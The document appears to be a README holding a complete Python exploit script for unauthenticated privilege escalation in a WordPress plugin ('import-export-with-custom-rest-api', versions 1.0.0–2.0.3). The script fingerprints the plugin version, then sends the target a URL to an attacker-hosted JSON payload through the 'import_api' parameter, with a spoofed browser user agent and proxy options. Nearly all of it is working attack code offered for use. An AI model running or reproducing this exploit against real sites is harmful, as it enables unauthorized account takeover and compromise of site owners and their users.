README.md
Rendering markdown...
import requests
import argparse
import time
import re
import json
import logging
from urllib.parse import urlparse
# By Khaled_alenazi (Nxploited)
def setup_logger(level=logging.INFO):
logger = logging.getLogger("Nxploit")
if not logger.handlers:
handler = logging.StreamHandler()
formatter = logging.Formatter("[%(levelname)s] %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(level)
return logger
logger = setup_logger()
def validate_url(url):
parsed = urlparse(url)
if not parsed.scheme.startswith("http"):
raise ValueError("Invalid URL scheme. Must start with http or https.")
if not parsed.netloc:
raise ValueError("Invalid URL: missing domain.")
return url.rstrip("/")
def version_in_range(version, start, end):
def normalize(v):
return list(map(int, v.split(".")))
return normalize(start) <= normalize(version) <= normalize(end)
def get_plugin_readme_url(base_url):
return f"{base_url}/wp-content/plugins/import-export-with-custom-rest-api/readme.txt"
def check_plugin_version(session, base_url, sleep_enabled=True):
readme_url = get_plugin_readme_url(base_url)
try:
response = session.get(readme_url, timeout=10)
if response.status_code == 404:
logger.warning(f"Plugin version file not found: {readme_url}")
return False
match = re.search(r"Stable tag:\s*([\d.]+)", response.text, re.IGNORECASE)
if not match:
logger.warning("Plugin version file found, but version tag missing.")
if sleep_enabled:
time.sleep(2)
return True
version = match.group(1).strip()
if version_in_range(version, "1.0.0", "2.0.3"):
logger.info(f"Target appears vulnerable (version: {version}) - exploiting...")
if sleep_enabled:
time.sleep(3)
return True
else:
logger.warning(f"Plugin version {version} is outside vulnerable range.")
return False
except requests.exceptions.RequestException as e:
logger.error(f"Requests error during version check: {e}")
return False
except Exception as e:
logger.error(f"Unexpected exception during version check: {e}")
return False
def fetch_json_payload(session, json_url):
try:
response = session.get(json_url, timeout=10)
response.raise_for_status()
payload = response.json()
return payload
except requests.exceptions.RequestException as e:
logger.error(f"Requests error retrieving JSON payload: {e}")
return None
except json.JSONDecodeError:
logger.error("Could not decode JSON payload. Check the JSON file format.")
return None
def Nxploit_exploit(session, base_url, json_url, sleep_enabled=True):
logger.info(f"Fetching JSON payload from: {json_url}")
payload = fetch_json_payload(session, json_url)
if payload is None:
logger.error("Failed to retrieve or parse JSON payload.")
return
logger.info("JSON content loaded successfully:")
for idx, item in enumerate(payload, 1):
logger.info(f" [{idx}] {json.dumps(item, indent=4)}")
if sleep_enabled:
time.sleep(3)
logger.info("Launching exploitation...")
if sleep_enabled:
time.sleep(3)
exploit_url = f"{base_url}/"
try:
r = session.post(exploit_url, data={"import_api": json_url}, timeout=10)
if "error" not in r.text.lower():
logger.info("Exploit delivered successfully.")
logger.info("Payload Sent:\n%s", json.dumps(payload, indent=4))
logger.info("Exploit By : Khaled_alenazi (Nxploited)")
else:
logger.warning("Exploit may have failed or returned error page.")
except requests.exceptions.RequestException as e:
logger.error(f"Requests error during exploitation: {e}")
def main():
parser = argparse.ArgumentParser(description="Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)")
parser.add_argument("-u", "--url", required=True, help="Base URL of WordPress site (e.g., http://target/wp/)")
parser.add_argument("-json", "--url_json", required=True, help="URL to hosted R.json payload")
parser.add_argument("--proxy", help="Proxy URL (e.g., http://127.0.0.1:8080)")
parser.add_argument("--timeout", type=int, default=10, help="HTTP timeout in seconds (default: 10)")
parser.add_argument("--no-verify", action="store_true", help="Disable SSL certificate verification (NOT recommended!)")
parser.add_argument("--no-sleep", action="store_true", help="Disable sleep delays for faster execution")
parser.add_argument("--debug", action="store_true", help="Enable debug output")
args = parser.parse_args()
if args.debug:
logger.setLevel(logging.DEBUG)
try:
base_url = validate_url(args.url)
except ValueError as ve:
logger.error(str(ve))
return
session = requests.Session()
session.verify = not args.no_verify
if args.no_verify:
logger.warning("SSL certificate verification is DISABLED. This is insecure!")
session.headers.update({
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
})
if args.proxy:
session.proxies = {"http": args.proxy, "https": args.proxy}
logger.info(f"Proxy set to: {args.proxy}")
if check_plugin_version(session, base_url, sleep_enabled=not args.no_sleep):
Nxploit_exploit(session, base_url, args.url_json, sleep_enabled=not args.no_sleep)
if __name__ == "__main__":
main()